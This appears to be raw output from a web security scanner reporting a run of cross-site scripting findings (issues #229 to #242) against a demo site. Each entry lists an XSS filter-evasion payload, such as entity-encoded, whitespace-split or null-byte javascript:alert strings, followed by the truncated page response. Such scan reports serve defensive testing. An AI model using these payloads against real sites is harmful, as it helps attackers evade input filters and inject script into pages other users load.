href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #229\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert(&quot;XSS&quot;)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #230\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #231\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #232\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert(String.fromCharCode(88,83,83)\n)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #233\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105\n;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&\n#39;&#88;&#83;&#83;&#39;&#41;>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #234\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#0000106&#0000097&#0000118&#0000097&\n#0000115&#0000099&#0000114&#0000105&#0000112&\n#0000116&#0000058&#0000097&#0000108&#0000101&\n#0000114&#0000116&#0000040&#0000039&#0000088&\n#0000083&#0000083&#0000039&#0000041>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #235\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#\nx69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#\nx27&#x58&#x53&#x53&#x27&#x29>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #236\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #237Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #238\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #239\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #240\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > \nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #241\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# perl -e 'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";' > \nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #242\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\" &#14; javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> 